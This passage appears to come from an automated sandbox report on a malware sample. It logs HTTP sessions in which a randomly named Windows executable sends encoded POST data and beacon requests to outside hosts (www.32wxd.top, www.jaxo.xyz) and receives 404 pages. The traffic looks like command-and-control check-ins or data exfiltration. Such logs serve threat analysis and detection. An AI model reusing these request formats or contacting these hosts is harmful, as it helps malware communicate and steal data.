                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  13 | 192.168.2.4 | 49750 | 206.119.82.116 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:42.714473963 CEST | 736 | OUT | POST /kyiu/ HTTP/1.1
                  Host: www.32wxd.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.32wxd.top
                  Referer: http://www.32wxd.top/kyiu/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=aBuNv8bUDAAzG/2gJyvugB/BeCJS/nZ/7bgQ1AaHB0UNr9i3XqkN6nG2DkZsJB+x87xV0V19ZKRMyMxk+JAsKpaQo3JqhtnzAx8Z0bNZ0R2H3heuH2gnRsazHN1kh9vRNT1+8N5js1FZOUR7+8xNVhDHJYFxEsljAQDfJmbUO9aAjgFhInNqcecmgqsMWV5fRA==
                  Sep 4, 2024 09:36:43.599426031 CEST | 691 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:43 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  14 | 192.168.2.4 | 49751 | 206.119.82.116 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:45.264497042 CEST | 756 | OUT | POST /kyiu/ HTTP/1.1
                  Host: www.32wxd.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.32wxd.top
                  Referer: http://www.32wxd.top/kyiu/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBC8Nrdy3WvEN5nG2LEZpXx+A87820UJ9ZKVMyOZk/6ovL5aW03J7ltnzAx8Z0bYE0ReH2QOuVDAoSsawNt1kl9uWNT1X8MkEswBZOVh765dCfhDNXoETD5c0Gx2qKle2HvjirGU7ZWs9Oe4V9tl4bWEWKIn2W2CK63ZWZB2ZNEpn4zE=
                  Sep 4, 2024 09:36:46.189671040 CEST | 691 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:46 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  15 | 192.168.2.4 | 49752 | 206.119.82.116 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:47.808141947 CEST | 10838 | OUT | POST /kyiu/ HTTP/1.1
                  Host: www.32wxd.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.32wxd.top
                  Referer: http://www.32wxd.top/kyiu/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBCENrOq3XOEN4nG2IEZoXx+Z87kq0UFLZJ9Mwthk4LovF5aW/XJrhtniAxsj0bIE0ReH2SmuCGgoUsazHN1gh9vxNSdt8Mg+vE1ZO1x78fJCZxDDWoE1D5ZzGxrVKmDbHs/iuTV4DSxjfNMfq8UeUU8BLp+LTDiGsXdDejXVWwVPq1IoRNdLdpgZlxoh/bo9oEh7il4xSc4VByCsY8YzQEwkt73ZggtsvPoPb+BLbVWR3N6IaVA3lgIyMwB/xgGK5W56eJb7CY7vbRjlci6O+uKEWaNaeODizQbShDOCDubglgRrvSwEstlNwIrNRbC0cLNd64biJcUli/MGMxnB/m/9zvvfCnBt1JCLZLJiBiuUlm0SyeT9g3RzGPP0XlOSewKAyqoAMSgMSTAEGc+e3evdFN3nFzwNhttV21Dw1loHj7Ari1LZL5QUzej9V9tk9rEismE+1CBDKxiOdJWmwEUXqNxwKvoi5OEjTnWNxdIoAceb3d3M5c3Xvgy/4ML26rLCqFYWpVlDYTmDrGP+vzMnv4BtRQ9TWLmXLOFbT52QVbGytoXTpfLSx9aLjAP7eyLgKvQnRpMMaw1VYErUApqFVfyv8MSKD3qGsNEqKaUEJgoVHPoEAvyZKH4kv5ktjBKrBimecJoC4suV1sABxQUOK2zO7Fs1Hj4OaEimmtmY0Nqxk2M6mEfiprsm/NuewmYtxP4wNXqohIX6KFmOweJ5JDii0//l8lf9X7WqkJMkszu0hmHqZx14af7yKS0+I6cj79MBkODD+09mVqfPkClyrztKCILEDfxN7Sk3Z4UIl5PWcP2R922lhgwsrsqMsXmDUGP0sJTkAJdoUu/wBuCGNzRGqV1OZSBonwKVgS1Q3nGN7YxPV6AvI3/G/78oKoOrUuZubSS2gQ6R2428B3PscYugREvV+hugjMeGiZy5a3QxVgNBMyvaY3099OqCrK/eG1h [TRUNCATED]
                  Sep 4, 2024 09:36:48.694749117 CEST | 691 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:48 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  16 | 192.168.2.4 | 49753 | 206.119.82.116 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:50.351444960 CEST | 478 | OUT | GET /kyiu/?56gD=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.32wxd.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:36:51.255268097 CEST | 691 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:51 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  17 | 192.168.2.4 | 49754 | 66.29.149.180 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:56.317368984 CEST | 733 | OUT | POST /f9bc/ HTTP/1.1
                  Host: www.jaxo.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jaxo.xyz
                  Referer: http://www.jaxo.xyz/f9bc/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 51 4b 51 57 34 33 4a 50 6a 74 63 65 6b 54 6c 65 6a 61 56 32 31 61 5a 38 68 46 7a 6f 33 41 73 74 6e 53 76 43 6f 43 32 41 72 79 65 55 45 77 78 70 2f 50 55 75 63 54 45 6c 4e 68 57 62 65 69 77 6c 31 2f 6f 56 79 4c 64 32 4a 35 2b 6e 7a 77 39 36 64 70 50 6e 47 64 76 58 54 36 35 42 51 30 6d 50 50 33 65 38 44 63 79 4b 70 6a 6f 32 44 46 37 79 52 4b 2b 56 48 46 4c 70 41 37 34 61 6d 66 67 59 35 50 34 38 78 42 7a 50 62 63 7a 49 4c 34 58 63 43 7a 74 56 72 46 67 46 64 48 33 57 53 48 46 4c 6d 66 5a 69 65 46 71 6e 59 77 69 67 30 51 58 37 37 69 70 54 7a 77 3d 3d
                  Data Ascii: 56gD=3QjmXr4dAreEQKQW43JPjtcekTlejaV21aZ8hFzo3AstnSvCoC2AryeUEwxp/PUucTElNhWbeiwl1/oVyLd2J5+nzw96dpPnGdvXT65BQ0mPP3e8DcyKpjo2DF7yRK+VHFLpA74amfgY5P48xBzPbczIL4XcCztVrFgFdH3WSHFLmfZieFqnYwig0QX77ipTzw==
                  Sep 4, 2024 09:36:56.901293993 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:56 GMT
                  Server: Apache
                  Content-Length: 13840
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                  Sep 4, 2024 09:36:56.901365995 CEST | 224 | IN | Data Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                  Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                  Sep 4, 2024 09:36:56.901376963 CEST | 1236 | IN | Data Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                  Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                  Sep 4, 2024 09:36:56.901386976 CEST | 1236 | IN | Data Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
                  Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                  Sep 4, 2024 09:36:56.901397943 CEST | 1236 | IN | Data Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                  Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                  Sep 4, 2024 09:36:56.901411057 CEST | 672 | IN | Data Raw: 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63 2d 2e 33 36 38 2e 35 34 39 2d 2e 35 34 20 31
                  Data Ascii: (161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.446.61-1.774 1.09
                  Sep 4, 2024 09:36:56.901532888 CEST | 1236 | IN | Data Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                  Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                  Sep 4, 2024 09:36:56.901549101 CEST | 1236 | IN | Data Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                  Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                  Sep 4, 2024 09:36:56.901561022 CEST | 448 | IN | Data Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                  Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                  Sep 4, 2024 09:36:56.901573896 CEST | 1236 | IN | Data Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                  Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                  Sep 4, 2024 09:36:56.906225920 CEST | 1236 | IN | Data Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                  Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  18 | 192.168.2.4 | 49755 | 66.29.149.180 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:36:58.855741978 CEST | 753 | OUT | POST /f9bc/ HTTP/1.1
                  Host: www.jaxo.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jaxo.xyz
                  Referer: http://www.jaxo.xyz/f9bc/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 49 74 69 48 54 43 36 58 57 41 6f 79 65 55 51 41 77 6a 77 76 56 69 63 54 34 63 4e 6b 75 62 65 6a 51 6c 31 37 73 56 7a 38 78 35 4a 70 2b 66 37 51 39 43 54 4a 50 6e 47 64 76 58 54 35 46 72 51 30 65 50 50 44 69 38 41 2b 57 4c 71 6a 6f 31 41 46 37 79 56 4b 2b 5a 48 46 4c 41 41 34 39 33 6d 64 59 59 35 4b 45 38 78 55 47 5a 56 63 7a 4f 50 34 57 76 53 53 63 4e 68 56 52 75 62 6b 71 7a 56 55 68 66 75 35 49 34 50 30 4c 77 4b 77 47 54 70 58 65 50 32 68 55 61 6f 77 47 61 67 75 73 56 4d 74 65 49 51 64 52 49 76 70 6c 77 34 76 67 3d
                  Data Ascii: 56gD=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyItiHTC6XWAoyeUQAwjwvVicT4cNkubejQl17sVz8x5Jp+f7Q9CTJPnGdvXT5FrQ0ePPDi8A+WLqjo1AF7yVK+ZHFLAA493mdYY5KE8xUGZVczOP4WvSScNhVRubkqzVUhfu5I4P0LwKwGTpXeP2hUaowGagusVMteIQdRIvplw4vg=
                  Sep 4, 2024 09:36:59.591449022 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:59 GMT
                  Server: Apache
                  Content-Length: 13840
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                  Sep 4, 2024 09:36:59.591536999 CEST | 224 | IN | Data Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                  Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                  Sep 4, 2024 09:36:59.591553926 CEST | 1236 | IN | Data Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                  Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                  Sep 4, 2024 09:36:59.591564894 CEST | 1236 | IN | Data Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
